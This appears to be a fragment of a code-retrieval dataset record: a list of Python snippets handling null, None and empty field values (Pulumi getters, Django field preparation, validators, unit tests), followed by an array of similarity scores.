"def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def get_prep_value(self, value):\n if (value is UNKNOWN) or (value is ''):\n # If Django tries to save an empty string, send the db None (NULL).\n return None\n else:\n # Otherwise, just pass the value.\n return value", "def _nullify(self, value):\n if not str(value).strip():\n return None\n else:\n return value", "def test_serialize_none(self):\n self.assertEqual(serialize(None), 'null')", "def test_add_none_field(self):\n 
user_id = get_rand_string()\n data = get_rand_string()\n id = get_rand_string()\n\n doc = {}\n doc[\"user_id\"] = user_id\n doc[\"data\"] = data\n doc[\"id\"] = id\n doc[\"num\"] = None\n\n self.conn.add(**doc)", "def testNoneValue(self):\n objectID = uuid4()\n user = createUser(u'username', u'password', u'User',\n u'user@example.com')\n namespace = createNamespace(user, u'name')\n tag = createTag(user, namespace, u'tag')\n self.store.add(TagValue(user.id, tag.id, objectID, None))", "def guiField(self, value):\n return None", "def field(self):\n return None", "def NULL(self, t):\n t.value = None\n return t", "def validate_empty_field(self, field, value):\n self.value = value\n self.field = field\n if self.value == \"\":\n message = \"{} field cannot be blank!\".format(self.field)\n raise GraphQLError(message)", "def filter_is_null(self, queryobject):\n raise NotImplementedError()", "def form_InputNoneValue(request):\n schema = schemaish.Structure()\n schema.add('inputStrip', schemaish.String(default=''))\n\n form = formish.Form(schema, 'form')\n form['inputStrip'].widget = formish.Input(strip=True, none_value='BANG')\n return form", "def allow_null_values(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_null_values\")", "def clearField(self):\n self.field.setValue(self.default_val)", "def clearField(self):\n self.field.setValue(self.default_val)", "def format_field(self, value, format_spec):\n if value is None:\n return format(value)\n else:\n return super(NoneFormatter, self).format_field(value, format_spec)\n if value is None:\n return format(value)\n else: raise e", "def setNone(self):\n self.setValue([])", "def convert_nil(self, v, t):\n assert len(v) == 0\n return None", "def _deserialize_null(self, *args):\n return None", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def test_null_field(self):\r\n problem = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNotNone(problem.markdown)\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'nullout': ['markdown']}\r\n )\r\n problem = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNone(problem.markdown)", "def _encode_nullable(data_type, obj, alias_validators, old_style, for_msgpack):\n if obj is not None:\n return _json_compat_obj_encode_helper(\n data_type.validator, obj, alias_validators, old_style, for_msgpack)\n else:\n return None", "def test_update_field_to_null(self, field, field_name):\n control = factories.ControlFactory()\n\n response = self.api.put(control, control.id, {field: None})\n\n self.assert400(response)\n self.assertEqual(response.json[\"message\"],\n field_name + \" for the object is not specified\")\n control = db.session.query(all_models.Control).get(control.id)\n self.assertIsNotNone(control.external_id)", "def is_null(self):\n return self.value is None", "def _val_is_null(self, val):\r\n return val is None", "def clean(self, value):\n if self.null_option is not None and value == settings.FILTERS_NULL_CHOICE_VALUE:\n return None\n return super().clean(value)", "def test_value_to_string(self):\r\n obj = self.rp\r\n field = self.rp._meta.get_field_by_name('body')[0]\r\n self.assertNotEqual(field.value_to_string(obj), u'') # expected\r\n self.assertEqual(field.value_to_string(None), u'') # edge case\r", "def testNoneAssignment(self):\n class 
MyMessage(messages.Message):\n\n my_field = messages.StringField(1)\n\n m1 = MyMessage()\n m2 = MyMessage()\n m2.my_field = None\n self.assertEquals(m1, m2)", "def get_prep_value(self, value):\r\n if value == \"\" or value is None:\r\n return None\r\n\r\n #if isinstance(value, dict):\r\n value = json.dumps(value, default=encode_object, ensure_ascii=False, separators=(',',':'))\r\n\r\n return super(JSONField, self).get_prep_value(value)", "def filter_is_not_null(self, queryobject):\n raise NotImplementedError()", "def _set_if_not_none(self, field_key, value, verifier=str):\n\n\t\tif value is None:\n\t\t\treturn\n\n\t\tif verifier is not None:\n\t\t\tvalue = verifier(value)\n\n\t\tself.data[field_key] = value", "def temp_validator(cls, value, field):\n if value == \"U\":\n LOGGER.warning(\"{field.name} value is 'U'. Setting to None.\")\n return None\n return value", "def __str__(self):\r\n # If the original value is None, represent this as 'NULL'\r\n if self.original is None:\r\n return 'NULL'\r\n return str(self.original)", "def test_none(self):\n self.assertEqual(self.obj.to_json_string(None), '[]')", "def changenonetoNone(s):\r\n if s=='None':\r\n return None\r\n else:\r\n return s", "def test_nullable_text(self):\r\n entity = NullableTextModel(text=None)\r\n entity.save()\r\n\r\n db_entity = NullableTextModel.objects.get()\r\n self.assertEquals(db_entity.text, None)", "def null() -> SetupVal:\n return NullVal()", "def allow_null_values(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_null_values\")", "def none(self):", "def run(self, value):\r\n return '' if value is None else value", "def encode_null_term(self, input):\n return input.encode() + b'\\x00'", "def _set_None(self):\n\n self.description = None\n self.func = None", "def get_blank(record, field_name, reason=\" in this case.\"):\n val = recordval(record, field_name)\n if val == \"\":\n return \"\"\n else:\n parser_error(\"field \"+field_name+\" must be blank\"+reason)\n return val", "def not_null(value):\n if value is None or value == \"\":\n raise ValidationError(\"The value must not be None\")\n\n return True", "def null_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardPageWidgetMarkdownNullValueArgs']]]]:\n return pulumi.get(self, \"null_values\")", "def __call__(self, value):\n value = str(value).strip()\n\n if len(value) == 0:\n pass\n\n else:\n super().__call__(value)", "def null_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardPageWidgetFunnelNullValueArgs']]]]:\n return pulumi.get(self, \"null_values\")", "def check_integrity(dict):\n if (dict['type'] == 'string') and (dict['value'] == None or dict['value'] == ''):\n dict['value'] = '\"\"'", "def quote_or_null(self, val: str, quotes: str = \"'\", null: str = \"NULL\", strings_only = True) -> str:\n if val is None: return null\n if strings_only and isinstance(val, str):\n return f\"{quotes}{val}{quotes}\"\n return val", "def EmptyStringField(**kwargs: Any) -> Any:\n return Field(\"\", **kwargs)", "def null_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardPageWidgetBulletNullValueArgs']]]]:\n return pulumi.get(self, \"null_values\")", "def nullValueToNan(self) -> None:\n self.cpp.nullValueToNan()", "def null_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardPageWidgetBillboardNullValueArgs']]]]:\n return pulumi.get(self, \"null_values\")", "def string(self, value):\n # respect {None}\n if value is None:\n # by leaving it alone\n return None\n # my value 
knows\n return str(value)", "def _validate_on_value(self, value: Any) -> None:\n if not self._is_nullable and value is None:\n msg = \"Non-nullable field cannot have None value\"\n if self._resolve_field_name() is not None:\n msg += f\" (field name = '{self._resolve_field_name()}')\"\n raise FieldValueValidationError(msg)", "def _normalize_argument(self, value):\n return storepass.utils.normalize_empty_to_none(value)", "def str_or_none(val):\n return str(val) if val is not None else None", "def test_field_none_nullable(self):\n node_dict = {\n 'host_name': 'abc'\n }\n try:\n Node(**node_dict)\n except Exception as e:\n self.assertEqual(type(e), ValueError)", "def for_json(self):\n if self.value_is_null:\n return None\n return str(self)", "def leaf_NoneType(self, value, depth, available):\n return \"null\", False", "def null(self):\n val = self.read(4)\n if val != b'null':\n self.on_parser_error(\"null token expected\")\n return null", "def noneToString(text):\n if text in (None, \"\"):\n return \"None\"\n else:\n return str(text)", "def test_update_risk_field_to_null(self, field, field_name):\n risk = factories.RiskFactory()\n\n response = self.api.put(risk, risk.id, {\n field: None,\n })\n\n self.assert400(response)\n self.assertEqual(response.json[\"message\"],\n field_name + \" for the object is not specified\")\n risk = db.session.query(all_models.Risk).get(risk.id)\n self.assertIsNotNone(risk.external_id)", "def test_none(self):\n self.assertEqual(b\"\", self.successResultOf(to_xml(None)))", "def null_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardPageWidgetPyNullValueArgs']]]]:\n return pulumi.get(self, \"null_values\")", "def nonull(val):\n return val if not pd.isnull(val) else None", "def value(self):\r\n v = None\r\n if not self.field.is_readonly() and self.params is not None:\r\n # submitted value. do not deserialize here since that requires\r\n # valid data, which we might not have\r\n try:\r\n v = self._serialized_value()\r\n except formalchemy.fields.FieldNotFoundError, e:\r\n pass\r\n if v:\r\n return v\r\n\r\n return \"\"" ]
[ "0.6952513", "0.69504404", "0.6532988", "0.6294436", "0.6274683", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.6172854", "0.6107132", "0.6084042", "0.60815674", "0.60674644", "0.6041294", "0.6036508", "0.6013354", "0.598232", "0.59685665", "0.5961358", "0.59434694", "0.58928", "0.58928", "0.58914244", "0.58762866", "0.5868474", "0.58605504", "0.58497256", "0.58497256", "0.58497256", "0.58449465", "0.58443236", "0.5838382", "0.5838114", "0.58210325", "0.57903826", "0.5786105", "0.57771176", "0.5763519", "0.57498974", "0.5747706", "0.5746769", "0.5738825", "0.57366353", "0.5735892", "0.5721641", "0.57176566", "0.5698875", "0.56894505", "0.5681631", "0.56803024", "0.5666041", "0.5651649", "0.5628474", "0.5615261", "0.5615035", "0.56100005", "0.5603432", "0.5580833", "0.55798763", "0.5574009", "0.5562675", "0.5547745", "0.5534809", "0.55301976", "0.5529392", "0.55251324", "0.55032134", "0.54964006", "0.5494551", "0.54909664", "0.54892105", "0.5487989", "0.5471998", "0.54626703", "0.5456147", "0.5446526" ]
0.0
-1
Get a specific role by id
def get(self, uuid): logger.info("Get a specific role by Id", data=uuid) role = Role.query.get(uuid) return role_schema.jsonify(role)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get(self, role_id):\n # Right now the only way is to list them all, then iterate.\n # Perhaps a filter or new endpoint would be useful here.\n roles = self.list()\n for role in roles:\n if role.id == role_id:\n return role\n raise exc.HTTPNotFound()", "def get(self, id):\n return Role.query.filter(Role.id == id).one()", "def get_role_by_id(self, role_id):\n try:\n role = self.db_handler.get_role_by_id(role_id)\n\n self.logger.write_to_log('got role by id', 'model')\n return role\n except Exception as err:\n method_name = sys._getframe().f_code.co_name\n\n self.logger.write_to_log('exception', 'model')\n self.logger.write_to_err_log(f'exception in method {method_name} - {err}', 'model')", "def get(self, role_id):\n return self.client.get_role(role_id)", "def get_role(self, role_id):\n raise exception.NotImplemented() # pragma: no cover", "async def role_from_id(self, guild: discord.Guild, role_id: int):\n\n return discord.utils.get(guild.roles, id=role_id)", "def get_role(role_id: int) -> Optional[Role]:\n return db.session.query(Role).get(role_id)", "async def get_role(request, role_id):\n conn = await create_connection()\n\n head_block = await utils.get_request_block(request)\n role_resource = await roles_query.fetch_role_resource(conn, role_id)\n conn.close()\n return await utils.create_response(conn, request.url, role_resource, head_block)", "async def fetch(cls, id: Union[str, int]) -> Optional[\"Role\"]:\n query = \"\"\"SELECT * FROM roles WHERE id = $1;\"\"\"\n role = await cls.pool.fetchrow(query, int(id))\n\n if role is not None:\n role = cls(**role)\n\n return role", "def get_role(role_id):\n\tsession = get_session()\n\tresponse = session.get(\"{url}/api/roles/{role_id}\".format(url=get_registry_url(), role_id=role_id))\n\treturn response.json()", "def get_role(self, role_id: int, /) -> Optional[Role]:\n return self.guild.get_role(role_id) if self._roles.has(role_id) else None", "def get(self, id, timeout=None):\n req = RoleGetRequest()\n\n req.id = (id)\n tries = 0\n plumbing_response = None\n while True:\n try:\n plumbing_response = self.stub.Get(\n req,\n metadata=self.parent.get_metadata('Roles.Get', req),\n timeout=timeout)\n except Exception as e:\n if self.parent.shouldRetry(tries, e):\n tries += 1\n self.parent.jitterSleep(tries)\n continue\n raise plumbing.convert_error_to_porcelain(e) from e\n break\n\n resp = models.RoleGetResponse()\n resp.meta = plumbing.convert_get_response_metadata_to_porcelain(\n plumbing_response.meta)\n resp.role = plumbing.convert_role_to_porcelain(plumbing_response.role)\n resp.rate_limit = plumbing.convert_rate_limit_metadata_to_porcelain(\n plumbing_response.rate_limit)\n return resp", "def get_role(role_id):\n\n \"\"\"\n example\n role_id = 3409643000000026005\n \"\"\"\n\n # Get instance of RolesOperations Class\n roles_operations = RolesOperations()\n\n # Call get_role method that takes role_id as parameter\n response = roles_operations.get_role(role_id)\n\n if response is not None:\n\n # Get the status code from response\n print('Status Code: ' + str(response.get_status_code()))\n\n if response.get_status_code() in [204, 304]:\n print('No Content' if response.get_status_code() == 204 else 'Not Modified')\n return\n\n # Get object from response\n response_object = response.get_object()\n\n if response_object is not None:\n\n # Check if expected ResponseWrapper instance is received.\n if isinstance(response_object, ResponseWrapper):\n\n # Get the list of obtained Role instances\n roles_list = response_object.get_roles()\n\n for role 
in roles_list:\n # Get the DisplayLabel of each Role\n print(\"Role DisplayLabel: \" + role.get_display_label())\n\n # Get the forecastManager User instance of each Role\n forecast_manager = role.get_forecast_manager()\n\n # Check if forecastManager is not None\n if forecast_manager is not None:\n\n # Get the ID of the forecast Manager\n print(\"Role Forecast Manager User-ID: \" + str(forecast_manager.get_id()))\n\n # Get the name of the forecast Manager\n print(\"Role Forecast Manager User-Name: \" + forecast_manager.get_name())\n\n # Get the ShareWithPeers of each Role\n print(\"Role ShareWithPeers: \" + str(role.get_share_with_peers()))\n\n # Get the Name of each Role\n print(\"Role Name: \" + role.get_name())\n\n # Get the Description of each Role\n print(\"Role Description: \" + role.get_description())\n\n # Get the Id of each Role\n print(\"Role ID: \" + str(role.get_id()))\n\n # Get the reporting_to User instance of each Role\n reporting_to = role.get_reporting_to()\n\n # Check if reporting_to is not None\n if reporting_to is not None:\n # Get the ID of the reporting_to User\n print(\"Role ReportingTo User-ID: \" + str(reporting_to.get_id()))\n\n # Get the name of the reporting_to User\n print(\"Role ReportingTo User-Name: \" + reporting_to.get_name())\n\n # Get the AdminUser of each Role\n print(\"Role AdminUser: \" + str(role.get_admin_user()))\n\n # Check if the request returned an exception\n elif isinstance(response_object, APIException):\n # Get the Status\n print(\"Status: \" + response_object.get_status().get_value())\n\n # Get the Code\n print(\"Code: \" + response_object.get_code().get_value())\n\n print(\"Details\")\n\n # Get the details dict\n details = response_object.get_details()\n\n for key, value in details.items():\n print(key + ' : ' + str(value))\n\n # Get the Message\n print(\"Message: \" + response_object.get_message().get_value())", "def get_user_role_by_id(self, user_id):\n try:\n role = self.db_handler.get_user_role_by_id(user_id)\n\n self.logger.write_to_log('got user role information', user_id)\n\n return role\n except Exception as err:\n method_name = sys._getframe().f_code.co_name\n\n self.logger.write_to_log('exception', 'model')\n self.logger.write_to_err_log(f'exception in method {method_name} - {err}', 'model')", "def get_role(guild: discord.Guild, role_id: int = None, role_name: str = None) -> Optional[discord.Role]:\n if guild is None:\n raise ValueError(\"guild is None\")\n if role_id is None and role_name is None:\n raise ValueError(\"Either role_id or role_name must be specified\")\n for role in guild.roles:\n if role.id == role_id or (role_name is not None and role.name.lower() == role_name.lower()):\n return role\n return None", "def show_keystone_v3_role(self, role_id):\n LOG_OBJ.debug(\"Details of a role.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/roles/\" + str(role_id)\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting the \"\n \"details of role\")\n print (\"No response from Server while getting the \"\n \"details of role\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Show role Failed with status %s and error : %s\" %\n (response.status, response.data))\n print (\"Show role Failed with status %s and error : %s\" %\n (response.status, response.data))\n return 
response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Role details : %s \" % output)\n print (\"Role details : %s \" % output)\n return output['role']", "def get_role(user_id):\n # Get db object and users table\n db = get_db()\n users = db.users\n\n # Check if user_id is a valid user in the users collection\n cursor = users.find({\"user_id\": str(user_id)})\n # if cursor.count() is 0:\n # raise APIException(status_code=404, message='user_id not found')\n # elif cursor.count() > 1:\n # raise APIException(status_code=500, message=\"Error, multiple users with same user_id found, which is not allowed\")\n\n context = {}\n\n if cursor.count() is 0:\n context['role'] = \"\"\n elif cursor.count() > 1:\n raise APIException(status_code=500, message=\"Error, multiple users with same user_id found, which is not allowed\")\n else:\n for document in cursor:\n context['role'] = document['role']\n\n context['url'] = \"/api/v1/role/\" + str(user_id) + \"/\"\n return flask.jsonify(**context)", "def test_get_by_id(self):\n actual = chef_role.get_by_id(self.role_id)\n eq_(actual['chef_role_name'], self.role_name)", "async def role_from_config(self, guild: discord.Guild, iden: str):\n\n id_ = await getattr(self.config.guild(guild), iden)()\n\n return discord.utils.get(guild.roles, id=id_)", "def __find_role (label):\n from data import role as mod\n roles = mod.load ( )\n \n for role in roles.get_all ( ):\n if label == role.label:\n return role\n else:\n raise Exception ('Aplikacija ne pozna vloge: ' + label)", "def getRoleInfo(self, role_id):\n return self._roles[role_id]", "def get(self):\n return self._roles.get(self._id)", "def get_role_id(name: str) -> str:\n response = api.get_roles()\n\n if not response.ok:\n print(response.data)\n sys.exit(1)\n\n for role in response.data.get(\"items\"):\n if role.get(\"name\") == ROLE:\n return role.get(\"id\")\n else:\n return None", "def find_role(self, name):\n return self.get_session.query(self.role_model).filter_by(name=name).one_or_none()", "def get_role(self, name):\n role = Role.query.filter_by(name=name).first()\n\n return role", "def get(self, pk=None, **kwargs):\n if kwargs.pop('include_debug_header', True):\n debug.log('Getting the role record.', header='details')\n data, self.endpoint = self.data_endpoint(kwargs)\n response = self.read(pk=pk, fail_on_no_results=True,\n fail_on_multiple_results=True, **data)\n item_dict = response['results'][0]\n self.configure_display(item_dict)\n return item_dict", "def get_roles(self, principal_id):", "def get_course_access_role(user, org, course_id, role):\n try:\n course_access_role = _CourseAccessRole.objects.get(\n user=user,\n org=org,\n course_id=course_id,\n role=role,\n )\n except _CourseAccessRole.DoesNotExist:\n log.exception('No CourseAccessRole found for user_id=%(user_id)s, org=%(org)s, '\n 'course_id=%(course_id)s, and role=%(role)s.', {\n 'user': user.id,\n 'org': org,\n 'course_id': course_id,\n 'role': role,\n })\n return None\n return course_access_role", "def get(self, id, timeout=None):\n req = RoleGrantGetRequest()\n\n req.id = (id)\n tries = 0\n plumbing_response = None\n while True:\n try:\n plumbing_response = self.stub.Get(\n req,\n metadata=self.parent.get_metadata('RoleGrants.Get', req),\n timeout=timeout)\n except Exception as e:\n if self.parent.shouldRetry(tries, e):\n tries += 1\n self.parent.jitterSleep(tries)\n continue\n raise plumbing.convert_error_to_porcelain(e) from e\n break\n\n resp = models.RoleGrantGetResponse()\n resp.meta = 
plumbing.convert_get_response_metadata_to_porcelain(\n plumbing_response.meta)\n resp.role_grant = plumbing.convert_role_grant_to_porcelain(\n plumbing_response.role_grant)\n resp.rate_limit = plumbing.convert_rate_limit_metadata_to_porcelain(\n plumbing_response.rate_limit)\n return resp", "def get_role_id(self, role_name):\n _url = \"http://\" + self.host_ip + \":35357/v2.0/OS-KSADM/roles\"\n _body = None\n _headers = {'Content-type': 'application/json',\n 'x-auth-token': self.cloud_admin_info['token_project']}\n response = self.request(\"GET\", _url, _headers, _body)\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting roles.\")\n return response\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get role id for %s Failed with status %s \" %\n response.status)\n return response.status\n output = json.loads(response.data)\n\n for value in output['roles']:\n if value['name'].lower() == role_name.lower():\n LOG_OBJ.debug(\"The role id for role: %s is %s\" % (role_name,\n value['id']))\n return value['id']\n\n LOG_OBJ.error(\"There is NO Role with name: %s\" % role_name)\n return None", "def find_role(self, *args, **kwargs):\n raise NotImplementedError", "def get_role(self, role_name):\n role_record = self.list_roles(('name', role_name))\n if len(role_record) < 1:\n raise Exception('Role \\'%s\\' does not exist.' % role_name)\n return role_record[0]", "def roleDocumentId(self, id: str) -> str:", "def get_keystone_v3_role_id(self, role_name):\n LOG_OBJ.debug(\"Get the role ID.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/roles?name=\" + \\\n str(role_name)\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting the \"\n \"ID of role\")\n print (\"No response from Server while getting the \"\n \"ID of role\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get role ID Failed with status %s and error \"\n \": %s\" % (response.status, response.data))\n print (\"Get role ID Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"role details : %s \" % output)\n print (\"role details : %s \" % output)\n if len(output['roles']) != 1:\n LOG_OBJ.debug(\"No. of roles with name %s is %s\"\n % (role_name, len(output['roles'])))\n print(\"No. 
of roles with name %s is %s\"\n % (role_name, len(output['roles'])))\n return\n return output['roles'][0]['id']", "def get_trust_role(self, trust_id, role_id):\n resp, body = self.get(\"OS-TRUST/trusts/%s/roles/%s\"\n % (trust_id, role_id))\n self.expected_success(200, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body['role'])", "def get_roles(role):", "def getRole(self, desired=None):\n strDes = str(desired)\n logging.debug(\"[LaymanAuthLiferay][getRole]: '%s'\"%strDes)\n if not self.authorised:\n logging.error(\"[LaymanAuthLiferay][getRole] The user is not authorised\")\n raise AuthError(401, \"I am sorry, but you are not authorised\")\n if self.authJson[\"userInfo\"] and self.authJson[\"userInfo\"][\"roles\"]:\n roles = self.authJson[\"userInfo\"][\"roles\"]\n if len(roles) < 1:\n logging.error(\"[LaymanAuthLiferay][getRole] Cannot determine the workspace - Liferay provided empty list of roles\")\n raise AuthError(500,\"Cannot determine the workspace - Liferay provided empty list of roles\") \n\n theRole = roles[0]\n for r in roles:\n if desired == r[\"roleName\"]:\n theRole = r\n\n #lower and spaces\n #theRole[\"roleName\"] = theRole[\"roleName\"].lower()\n #theRole[\"roleName\"] = \"_\".join(theRole[\"roleName\"].split(' '))\n roleName = theRole[\"roleName\"]\n logging.debug(\"[LaymanAuthLiferay][getRole] The role: '%s'\"% roleName)\n return theRole\n else: \n logging.error(\"[LaymanAuthLiferay][getRole] Cannot determine the workspace - Liferay did not provide user's roles\")\n raise AuthError(500,\"Cannot determine the workspace - Liferay did not provide user's roles\")", "def _get_role(self):\n return self.__role", "async def get_role(self, guild: discord.Guild, create: bool = False, updatedb: bool = True) -> discord.Role | None:\n # Create role if necessary or return None since no role id\n if self.role is None:\n return await self.create_role(guild, updatedb=updatedb) if create else None\n\n # Try to find role in cache\n if not (role := guild.get_role(self.role)):\n return await self.create_role(guild, updatedb=updatedb) if create else None\n return role", "def getRole(self, node):\n info = self.getNode(node, includeDevices=False)\n if info is None:\n self.log.error(\"could not get role because '%s' does not exist\", node)\n return None\n return info.role", "def getRoleInfo(self, role):", "def get_by_id(cls, id):\n return cls.query().get(id)", "def get(self, key: typing.Union[str, int], default: default_var=None) \\\n -> 'typing.Union[role.Role, default_var]':\n if isinstance(key, int):\n return self._roles.get(key, default)\n else:\n return self._get_by_name(key, default=default)", "def find_by_id(self, id_):\n return self.by_id.get(id_)", "def get_role(self):\n return self.role", "def get_role(self, role_name):\n try:\n response = self._client.get_role(RoleName=role_name)\n except Exception as e:\n return False\n\n return response", "def roles(self, role_id, data, tenant_id=None, api_version=\"v2.1\"):\n\n if tenant_id is None and self._parent_class.tenant_id:\n # Pull tenant_id from parent namespace cache.\n tenant_id = self._parent_class.tenant_id\n elif not tenant_id:\n # No value for tenant_id.\n raise TypeError(\"tenant_id is required but not set or cached.\")\n cur_ctlr = self._parent_class.controller\n\n url = str(cur_ctlr) + \"/{}/api/tenants/{}/roles/{}\".format(api_version,\n tenant_id,\n role_id)\n\n api_logger.debug(\"URL = %s\", url)\n return self._parent_class.rest_call(url, \"put\", data=data)", "def get_course(self, id):\n id 
= str(id)\n for i in range(len(self.courses)):\n if self.courses[i].id == id:\n return self.courses[i]", "def get(cls, id):\n\n return cls.query.get(id)", "def get(cls, id):\n\n return cls.query.get(id)", "def role_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"role_id\")", "def test_get_by_name(self):\n actual = chef_role.get_by_name(self.role_name)\n eq_(actual['chef_role_id'], self.role_id)", "def get(id):\n return User.query.filter_by(id=id).first()", "def create_partial_role_from_id(role_id, guild_id = 0):\n try:\n return ROLES[role_id]\n except KeyError:\n pass\n \n role = Role._create_empty(role_id, guild_id)\n ROLES[role_id] = role\n \n return role", "def get_role(ssm):\n nodes = ssm[\"nodes\"]\n for node in nodes:\n if node[\"type\"] == \"role\":\n return node[\"name\"]\n return \"no role\"", "def get_employeeRoles(self, id):\n cursor = self.dbconnect.get_cursor()\n cursor.execute('select * from employeeRoles where employee=%s', (id,))\n roles = list()\n for row in cursor:\n roles.append(row[1])\n return roles", "async def get(cls, member: discord.Member, role: discord.Role) -> Optional[\"TempRole\"]:\n data = await config.member(member).get_raw(str(role.id), default=None)\n if data is None:\n return None\n return cls(member, role=role, **data)", "def role_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"role_id\")", "def read_role(self, name, mount_point=DEFAULT_MOUNT_POINT):\n api_path = '/v1/{mount_point}/role/{name}'.format(\n mount_point=mount_point,\n name=name,\n )\n return self._adapter.get(\n url=api_path,\n )", "def get_requested_role(role_id: str, grant_type: str, duration: int = None) -> object:\n duration = 1 if not duration else abs(int(duration))\n start = datetime.datetime.utcnow()\n end = start + datetime.timedelta(hours=duration)\n\n roles = {\n \"PERMANENT\": {\n \"id\": role_id,\n \"name\": ROLE,\n \"grant_type\": \"PERMANENT\",\n \"grant_start\": None,\n \"grant_end\": None,\n \"floating_length\": None,\n \"explicit\": True,\n },\n \"FLOATING\": {\n \"id\": role_id,\n \"name\": ROLE,\n \"grant_type\": \"FLOATING\",\n \"grant_start\": None,\n \"grant_end\": None,\n \"floating_length\": duration,\n \"explicit\": True,\n },\n \"TIME_RESTRICTED\": {\n \"id\": role_id,\n \"name\": ROLE,\n \"grant_type\": \"TIME_RESTRICTED\",\n \"grant_start\": start.isoformat() + \"Z\",\n \"grant_end\": end.isoformat() + \"Z\",\n \"floating_length\": 0,\n \"explicit\": True,\n },\n }\n\n if grant_type not in roles:\n print(f\"Invalid grant type {grant_type}. 
Exiting...\")\n sys.exit(1)\n\n return roles[grant_type]", "def get_cached_role(self):\n cache = self.get_cache()\n if cache.disabled:\n return self\n roles = cache.get(self.ROLES_BY_ID)\n if roles is None or self.id not in roles:\n self.update_cache()\n roles = cache.get(self.ROLES_BY_ID)\n return roles.get(self.id, self)", "def get_role(resource_root, service_name, name, cluster_name=\"default\"):\n return _get_role(resource_root, _get_role_path(cluster_name, service_name, name))", "def get_role_id(args: argparse.Namespace) -> str:\n if args.role_id_json_file:\n if not Utils.is_secure_file(args.role_id_json_file):\n logging.warning(\"Permissions of file '%s' too liberal, consider setting more restrictive permissions\",\n args.role_id_json_file)\n role_id = Utils.extract_value_from_json_file(args.role_id_json_path, args.role_id_json_file)\n logging.info(\"Read role_id '%s' from JSON file '%s'\", role_id, args.role_id_json_file)\n else:\n role_id = args.role_id\n\n return role_id", "def get_user_role(cls, community_id, account_id):\n\n return DB.query_one(\"\"\"SELECT role_id FROM hive_roles\n WHERE community_id = :community_id\n AND account_id = :account_id\n LIMIT 1\"\"\",\n community_id=community_id,\n account_id=account_id) or Role.guest.value", "def role_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"role_id\")", "def show_user_role(instance_id):\n client = get_client()\n\n return client.get_current_user_role(instance_id=instance_id,\n custom_headers=get_custom_headers())", "def parse_role(text, guild = None):\n parsed = ID_RP.fullmatch(text)\n if (parsed is not None):\n role_id = int(parsed.group(1))\n try:\n role = ROLES[role_id]\n except KeyError:\n pass\n else:\n return role\n \n role = parse_role_mention(text)\n if (role is not None):\n return role\n \n if (guild is not None):\n if (guild is not None):\n role = guild.get_role_like(text)\n if (role is not None):\n return role\n \n return None", "def get_user_by_id(self, id):\n\t\treturn self.users.get(id)", "def find_role(self, roleName):\n try:\n return self.role2index[roleName]\n except:\n raise KeyError(\n f\"The role {roleName} is not in the general list... 
